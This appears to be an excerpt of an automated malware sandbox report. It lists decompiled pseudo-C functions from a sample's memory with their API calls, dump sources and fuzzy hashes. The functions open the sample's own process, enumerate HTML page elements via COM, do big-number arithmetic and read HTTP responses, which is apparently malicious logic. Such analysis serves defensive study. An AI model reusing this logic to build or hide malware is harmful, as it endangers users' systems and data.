                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: 05b55306ab0b3308c2999f2c54c2ed86ba63a7edcb6500aaee0898ec0b0673ab
                                                          • Instruction ID: 694932ae3aabc5eac74a8b2b6e0a7f936de787e87c17d8b7fdf69a2d3c637d43
                                                          • Opcode Fuzzy Hash: 05b55306ab0b3308c2999f2c54c2ed86ba63a7edcb6500aaee0898ec0b0673ab
                                                          • Instruction Fuzzy Hash: 7F012831104301ABDB30AA71DC48F1BBBECEF89BA8F314A35ED51914F0D721E8189B65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04953E69(intOrPtr _a4) {
                                                          				void* _t2;
                                                          				unsigned int _t4;
                                                          				void* _t5;
                                                          				long _t6;
                                                          				void* _t7;
                                                          				void* _t15;
                                                          
                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                          				 *0x495d26c = _t2;
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				_t4 = GetVersion();
                                                          				if(_t4 != 5) {
                                                          					L4:
                                                          					if(_t15 <= 0) {
                                                          						_t5 = 0x32;
                                                          						return _t5;
                                                          					}
                                                          					L5:
                                                          					 *0x495d25c = _t4;
                                                          					_t6 = GetCurrentProcessId();
                                                          					 *0x495d258 = _t6;
                                                          					 *0x495d264 = _a4;
                                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                          					 *0x495d254 = _t7;
                                                          					if(_t7 == 0) {
                                                          						 *0x495d254 =  *0x495d254 | 0xffffffff;
                                                          					}
                                                          					return 0;
                                                          				}
                                                          				if(_t4 >> 8 > 0) {
                                                          					goto L5;
                                                          				}
                                                          				_t15 = _t4 - _t4;
                                                          				goto L4;
                                                          			}

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0495131F,?,?,00000001,?,?,?,04954EF2,?), ref: 04953E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04954EF2,?), ref: 04953E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04954EF2,?), ref: 04953E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04954EF2,?), ref: 04953EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04954EF2,?), ref: 04953ED8
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: f695bb7d071a974d870339d102d8f68be1e07a925dc189d94b5d97c6656615d1
                                                          • Instruction ID: d07f316c47a26d7f1eedb5700eb773796aab60a896038aeab84e557c685e2b9f
                                                          • Opcode Fuzzy Hash: f695bb7d071a974d870339d102d8f68be1e07a925dc189d94b5d97c6656615d1
                                                          • Instruction Fuzzy Hash: 4AF01D70648305ABEB208F34A91DB193F99E784791F304A39ED42CA1D0D778A845CB15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 46%
                                                          			E04956F3A(intOrPtr* __eax) {
                                                          				void* _v8;
                                                          				WCHAR* _v12;
                                                          				void* _v16;
                                                          				char _v20;
                                                          				void* _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v32;
                                                          				intOrPtr _v40;
                                                          				short _v48;
                                                          				intOrPtr _v56;
                                                          				short _v64;
                                                          				intOrPtr* _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t57;
                                                          				intOrPtr* _t58;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr* _t65;
                                                          				short _t67;
                                                          				intOrPtr* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t72;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t87;
                                                          				intOrPtr _t103;
                                                          				intOrPtr _t109;
                                                          				void* _t118;
                                                          				void* _t122;
                                                          				void* _t123;
                                                          				intOrPtr _t130;
                                                          
                                                          				_t123 = _t122 - 0x3c;
                                                          				_push( &_v8);
                                                          				_push(__eax);
                                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                          				if(_t118 >= 0) {
                                                          					_t54 = _v8;
                                                          					_t103 =  *0x495d2a8; // 0x47a5a8
                                                          					_t5 = _t103 + 0x495e038; // 0x3050f485
                                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                          					_t56 = _v8;
                                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                          					if(_t118 >= 0) {
                                                          						__imp__#2(0x495c290);
                                                          						_v28 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_t118 = 0x8007000e;
                                                          						} else {
                                                          							_t60 = _v32;
                                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                          							_t87 = __imp__#6;
                                                          							_t118 = _t61;
                                                          							if(_t118 >= 0) {
                                                          								_t63 = _v24;
                                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                          								if(_t118 >= 0) {
                                                          									_t130 = _v20;
                                                          									if(_t130 != 0) {
                                                          										_t67 = 3;
                                                          										_v64 = _t67;
                                                          										_v48 = _t67;
                                                          										_v56 = 0;
                                                          										_v40 = 0;
                                                          										if(_t130 > 0) {
                                                          											while(1) {
                                                          												_t68 = _v24;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t123 = _t123;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                          												if(_t118 < 0) {
                                                          													goto L16;
                                                          												}
                                                          												_t70 = _v8;
                                                          												_t109 =  *0x495d2a8; // 0x47a5a8
                                                          												_t28 = _t109 + 0x495e0bc; // 0x3050f1ff
                                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                          												if(_t118 >= 0) {
                                                          													_t75 = _v16;
                                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                          													if(_t118 >= 0 && _v12 != 0) {
                                                          														_t79 =  *0x495d2a8; // 0x47a5a8
                                                          														_t33 = _t79 + 0x495e078; // 0x76006f
                                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                                          															_t83 = _v16;
                                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                          														}
                                                          														 *_t87(_v12);
                                                          													}
                                                          													_t77 = _v16;
                                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                          												}
                                                          												_t72 = _v8;
                                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                          												_v40 = _v40 + 1;
                                                          												if(_v40 < _v20) {
                                                          													continue;
                                                          												}
                                                          												goto L16;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								L16:
                                                          								_t65 = _v24;
                                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          							}
                                                          							 *_t87(_v28);
                                                          						}
                                                          						_t58 = _v32;
                                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                          					}
                                                          				}
                                                          				return _t118;
                                                          			}






































                                                          APIs
                                                          • SysAllocString.OLEAUT32(0495C290), ref: 04956F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 0495706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04957084
                                                          • SysFreeString.OLEAUT32(?), ref: 049570B3
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: fe50721dcfed20ae8fe453757b74b3b2e2f325e78e91e71e37136ab04fd6091e
                                                          • Instruction ID: 549afe5a83fba8ae0a907eadd2ecd106d369ce419489bcf57bf7555feb5f3e21
                                                          • Opcode Fuzzy Hash: fe50721dcfed20ae8fe453757b74b3b2e2f325e78e91e71e37136ab04fd6091e
                                                          • Instruction Fuzzy Hash: 83510175D00519DFCB11DFE8C4889AEF7B9EF89704F2485A4E915EB220D731AE41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E049553C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				void _v92;
                                                          				void _v236;
                                                          				void* _t55;
                                                          				unsigned int _t56;
                                                          				signed int _t66;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				signed int _t79;
                                                          				void* _t81;
                                                          				void* _t92;
                                                          				void* _t96;
                                                          				signed int* _t99;
                                                          				signed int _t101;
                                                          				signed int _t103;
                                                          				void* _t107;
                                                          
                                                          				_t92 = _a12;
                                                          				_t101 = __eax;
                                                          				_t55 = E04951AD1(_a16, _t92);
                                                          				_t79 = _t55;
                                                          				if(_t79 == 0) {
                                                          					L18:
                                                          					return _t55;
                                                          				}
                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                          				_t81 = 0;
                                                          				_t96 = 0x20;
                                                          				if(_t56 == 0) {
                                                          					L4:
                                                          					_t97 = _t96 - _t81;
                                                          					_v12 = _t96 - _t81;
                                                          					E049550FF(_t79,  &_v236);
                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04955745(_t101,  &_v236, _a8, _t96 - _t81);
                                                          					E04955745(_t79,  &_v92, _a12, _t97);
                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                          					_t66 = E049550FF(_t101, 0x495d1b0);
                                                          					_t103 = _t101 - _t79;
                                                          					_a8 = _t103;
                                                          					if(_t103 < 0) {
                                                          						L17:
                                                          						E049550FF(_a16, _a4);
                                                          						E04955088(_t79,  &_v236, _a4, _t97);
                                                          						memset( &_v236, 0, 0x8c);
                                                          						_t55 = memset( &_v92, 0, 0x44);
                                                          						goto L18;
                                                          					}
                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                          					do {
                                                          						if(_v8 != 0xffffffff) {
                                                          							_push(1);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push( *_t99);
                                                          							L0495AF2E();
                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                          							asm("adc edx, esi");
                                                          							_push(0);
                                                          							_push(_v8 + 1);
                                                          							_push(_t92);
                                                          							_push(_t74);
                                                          							L0495AF28();
                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                          								_t74 = _t74 | 0xffffffff;
                                                          								_v16 = _v16 & 0x00000000;
                                                          							}
                                                          						} else {
                                                          							_t74 =  *_t99;
                                                          						}
                                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                          						_a12 = _t74;
                                                          						_t76 = E04955F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                          						while(1) {
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							L13:
                                                          							_t92 =  &_v92;
                                                          							if(E049590C2(_t79, _t92, _t106) < 0) {
                                                          								break;
                                                          							}
                                                          							L14:
                                                          							_a12 = _a12 + 1;
                                                          							_t76 = E04956044(_t79,  &_v92, _t106, _t106);
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						_a8 = _a8 - 1;
                                                          						_t66 = _a12;
                                                          						_t99 = _t99 - 4;
                                                          						 *(0x495d1b0 + _a8 * 4) = _t66;
                                                          					} while (_a8 >= 0);
                                                          					_t97 = _v12;
                                                          					goto L17;
                                                          				}
                                                          				while(_t81 < _t96) {
                                                          					_t81 = _t81 + 1;
                                                          					_t56 = _t56 >> 1;
                                                          					if(_t56 != 0) {
                                                          						continue;
                                                          					}
                                                          					goto L4;
                                                          				}
                                                          				goto L4;
                                                          			}






















                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04955473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04955489
                                                          • memset.NTDLL ref: 04955529
                                                          • memset.NTDLL ref: 04955539
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 0e874c127d824c4a03a6acda61aca116f6818006eebc76393188cbb2c659a82a
                                                          • Instruction ID: 88dcf4648527f9cd97eb5b8b56bcdace85fabc100c06c5673b4a39e38290f6bf
                                                          • Opcode Fuzzy Hash: 0e874c127d824c4a03a6acda61aca116f6818006eebc76393188cbb2c659a82a
                                                          • Instruction Fuzzy Hash: 01418571600219BBEB10DF68CC40B9E7775EF84324F218539ED19A71A5DB70BD558B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 0495A82E
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • ResetEvent.KERNEL32(?), ref: 0495A8A2
                                                          • GetLastError.KERNEL32 ref: 0495A8C5
                                                          • GetLastError.KERNEL32 ref: 0495A970
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: 383a4a6bc2e21e3f3d849367aa0bc56266796d985d2f547a1209922f77c96ace
                                                          • Instruction ID: f612e05fd6963f26a26b2a09021315b66e84e291856259e60a7d7b869af828fb
                                                          • Opcode Fuzzy Hash: 383a4a6bc2e21e3f3d849367aa0bc56266796d985d2f547a1209922f77c96ace
                                                          • Instruction Fuzzy Hash: C6414E71500704BFDB21AFA1DC88E5F7FBDEB86704B204A39FA42D20A0E775A945CB24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 42%
                                                          			E049515FF(void* __eax, void* __ecx) {
                                                          				char _v8;
                                                          				void* _v12;
                                                          				intOrPtr _v16;
                                                          				char _v20;
                                                          				void* __esi;
                                                          				void* _t30;
                                                          				intOrPtr _t38;
                                                          				intOrPtr* _t39;
                                                          				intOrPtr* _t41;
                                                          				void* _t54;
                                                          				long _t64;
                                                          				void* _t67;
                                                          				void* _t69;
                                                          
                                                          				_t58 = __ecx;
                                                          				_t67 = __eax;
                                                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                          					L2:
                                                          					_t30 = _t67;
                                                          					_pop(_t68);
                                                          					_t69 = _t30;
                                                          					_t64 = 0;
                                                          					ResetEvent( *(_t69 + 0x1c));
                                                          					_push( &_v8);
                                                          					_push(4);
                                                          					_push( &_v20);
                                                          					_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          					if( *0x495d134() != 0) {
                                                          						L9:
                                                          						if(_v8 == 0) {
                                                          							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                          						} else {
                                                          							 *0x495d164(0, 1,  &_v12);
                                                          							if(0 != 0) {
                                                          								_t64 = 8;
                                                          							} else {
                                                          								_t38 = E0495A71F(0x1000);
                                                          								_v16 = _t38;
                                                          								if(_t38 == 0) {
                                                          									_t64 = 8;
                                                          								} else {
                                                          									_push(0);
                                                          									_push(_v8);
                                                          									_push( &_v20);
                                                          									while(1) {
                                                          										_t41 = _v12;
                                                          										_t61 =  *_t41;
                                                          										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                          										ResetEvent( *(_t69 + 0x1c));
                                                          										_push( &_v8);
                                                          										_push(0x1000);
                                                          										_push(_v16);
                                                          										_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          										if( *0x495d134() != 0) {
                                                          											goto L17;
                                                          										}
                                                          										_t64 = GetLastError();
                                                          										if(_t64 == 0x3e5) {
                                                          											_t64 = E04955646( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                          											if(_t64 == 0) {
                                                          												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          												if(_t64 == 0) {
                                                          													goto L17;
                                                          												}
                                                          											}
                                                          										}
                                                          										L19:
                                                          										E0495A734(_v16);
                                                          										if(_t64 == 0) {
                                                          											_t64 = E049570CC(_v12, _t69);
                                                          										}
                                                          										goto L22;
                                                          										L17:
                                                          										_t64 = 0;
                                                          										if(_v8 != 0) {
                                                          											_push(0);
                                                          											_push(_v8);
                                                          											_push(_v16);
                                                          											continue;
                                                          										}
                                                          										goto L19;
                                                          									}
                                                          								}
                                                          								L22:
                                                          								_t39 = _v12;
                                                          								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t64 = GetLastError();
                                                          						if(_t64 != 0x3e5) {
                                                          							L8:
                                                          							if(_t64 == 0) {
                                                          								goto L9;
                                                          							}
                                                          						} else {
                                                          							_t64 = E04955646( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                          							if(_t64 == 0) {
                                                          								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          								goto L8;
                                                          							}
                                                          						}
                                                          					}
                                                          					return _t64;
                                                          				} else {
                                                          					_t54 = E04959242(__ecx, __eax);
                                                          					if(_t54 != 0) {
                                                          						return _t54;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          			}

















                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 049518EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 04951907
                                                          • ResetEvent.KERNEL32(?), ref: 04951980
                                                          • GetLastError.KERNEL32 ref: 0495199B
                                                            • Part of subcall function 04959242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04959259
                                                            • Part of subcall function 04959242: SetEvent.KERNEL32(?), ref: 04959269
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 16b3e40ed46c81fd5cc74f6bf131d7c0fe904c68b09e40b7eb4c3ea0d1df41f0
                                                          • Instruction ID: d09388a49f5485d2684fed814ec7d244fa8a1195b023067116e47fa6163e723b
                                                          • Opcode Fuzzy Hash: 16b3e40ed46c81fd5cc74f6bf131d7c0fe904c68b09e40b7eb4c3ea0d1df41f0
                                                          • Instruction Fuzzy Hash: 0441C432A00604ABDB21DFA5DC45BAEB7BDEF84364F300639E955D7160E630FD418B10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E049511EE(signed int _a4, signed int* _a8) {
                                                          				void* __ecx;
                                                          				void* __edi;
                                                          				signed int _t6;
                                                          				intOrPtr _t8;
                                                          				intOrPtr _t12;
                                                          				short* _t19;
                                                          				void* _t25;
                                                          				signed int* _t28;
                                                          				CHAR* _t30;
                                                          				long _t31;
                                                          				intOrPtr* _t32;
                                                          
                                                          				_t6 =  *0x495d270; // 0xd448b889
                                                          				_t32 = _a4;
                                                          				_a4 = _t6 ^ 0x109a6410;
                                                          				_t8 =  *0x495d2a8; // 0x47a5a8
                                                          				_t3 = _t8 + 0x495e87e; // 0x61636f4c
                                                          				_t25 = 0;
                                                          				_t30 = E049538A8(_t3, 1);
                                                          				if(_t30 != 0) {
                                                          					_t25 = CreateEventA(0x495d2ac, 1, 0, _t30);
                                                          					E0495A734(_t30);
                                                          				}
                                                          				_t12 =  *0x495d25c; // 0x4000000a
                                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E0495A65C() != 0) {
                                                          					L12:
                                                          					_t28 = _a8;
                                                          					if(_t28 != 0) {
                                                          						 *_t28 =  *_t28 | 0x00000001;
                                                          					}
                                                          					_t31 = E04958EA1(_t32, 0);
                                                          					if(_t31 == 0 && _t25 != 0) {
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          					}
                                                          					if(_t28 != 0 && _t31 != 0) {
                                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                                          					}
                                                          					goto L20;
                                                          				} else {
                                                          					_t19 =  *0x495d10c( *_t32, 0x20);
                                                          					if(_t19 != 0) {
                                                          						 *_t19 = 0;
                                                          						_t19 = _t19 + 2;
                                                          					}
                                                          					_t31 = E0495A273(0,  *_t32, _t19, 0);
                                                          					if(_t31 == 0) {
                                                          						if(_t25 == 0) {
                                                          							L22:
                                                          							return _t31;
                                                          						}
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          						if(_t31 == 0) {
                                                          							L20:
                                                          							if(_t25 != 0) {
                                                          								CloseHandle(_t25);
                                                          							}
                                                          							goto L22;
                                                          						}
                                                          					}
                                                          					goto L12;
                                                          				}
                                                          			}














                                                          APIs
                                                            • Part of subcall function 049538A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,04DD9A98,00000000,?,?,63699BC3,00000005,0495D00C,?,?,04955D30), ref: 049538DE
                                                            • Part of subcall function 049538A8: lstrcpy.KERNEL32(00000000,00000000), ref: 04953902
                                                            • Part of subcall function 049538A8: lstrcat.KERNEL32(00000000,00000000), ref: 0495390A
                                                          • CreateEventA.KERNEL32(0495D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04953760,?,00000001,?), ref: 0495122F
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04953760,00000000,00000000,?,00000000,?,04953760,?,00000001,?,?,?,?,049552AA), ref: 0495128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04953760,?,00000001,?), ref: 049512BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04953760,?,00000001,?,?,?,?,049552AA), ref: 049512D5
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: a1c33002dddc3a3035a3236ac90b879a76dea5da13e5505f5bad36a82cae2dca
                                                          • Instruction ID: 21f1bc3c7e14ddbb7a4cf3aa0db15fa41cef3ef8182a5e4bebb52bac3ee38603
                                                          • Opcode Fuzzy Hash: a1c33002dddc3a3035a3236ac90b879a76dea5da13e5505f5bad36a82cae2dca
                                                          • Instruction Fuzzy Hash: 2C21F232E003006BDB21EA68AC89B6B77ADFB89750B750635FD05D7120DB64E8418784
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E04959242(void* __ecx, void* __esi) {
                                                          				char _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				long _v20;
                                                          				long _t34;
                                                          				long _t39;
                                                          				long _t42;
                                                          				long _t56;
                                                          				intOrPtr _t58;
                                                          				void* _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          
                                                          				_t61 = __esi;
                                                          				_t59 = __ecx;
                                                          				_t60 =  *0x495d13c; // 0x495abf1
                                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                          				do {
                                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                          					_v20 = _t34;
                                                          					if(_t34 != 0) {
                                                          						L3:
                                                          						_push( &_v16);
                                                          						_push( &_v8);
                                                          						_push(_t61 + 0x2c);
                                                          						_push(0x20000013);
                                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          						_v8 = 4;
                                                          						_v16 = 0;
                                                          						if( *_t60() == 0) {
                                                          							_t39 = GetLastError();
                                                          							_v12 = _t39;
                                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                          								L15:
                                                          								return _v12;
                                                          							} else {
                                                          								goto L11;
                                                          							}
                                                          						}
                                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                          							goto L11;
                                                          						} else {
                                                          							_v16 = 0;
                                                          							_v8 = 0;
                                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                          							_t58 = E0495A71F(_v8 + 1);
                                                          							if(_t58 == 0) {
                                                          								_v12 = 8;
                                                          							} else {
                                                          								_push( &_v16);
                                                          								_push( &_v8);
                                                          								_push(_t58);
                                                          								_push(0x16);
                                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          								if( *_t60() == 0) {
                                                          									E0495A734(_t58);
                                                          									_v12 = GetLastError();
                                                          								} else {
                                                          									 *((char*)(_t58 + _v8)) = 0;
                                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                          								}
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					}
                                                          					SetEvent( *(_t61 + 0x1c));
                                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                          					_v12 = _t56;
                                                          					if(_t56 != 0) {
                                                          						goto L15;
                                                          					}
                                                          					goto L3;
                                                          					L11:
                                                          					_t42 = E04955646( *(_t61 + 0x1c), _t59, 0xea60);
                                                          					_v12 = _t42;
                                                          				} while (_t42 == 0);
                                                          				goto L15;
                                                          			}















                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04959259
                                                          • SetEvent.KERNEL32(?), ref: 04959269
                                                          • GetLastError.KERNEL32 ref: 049592F2
                                                            • Part of subcall function 04955646: WaitForMultipleObjects.KERNEL32(00000002,0495A8E3,00000000,0495A8E3,?,?,?,0495A8E3,0000EA60), ref: 04955661
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          • GetLastError.KERNEL32(00000000), ref: 04959327
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
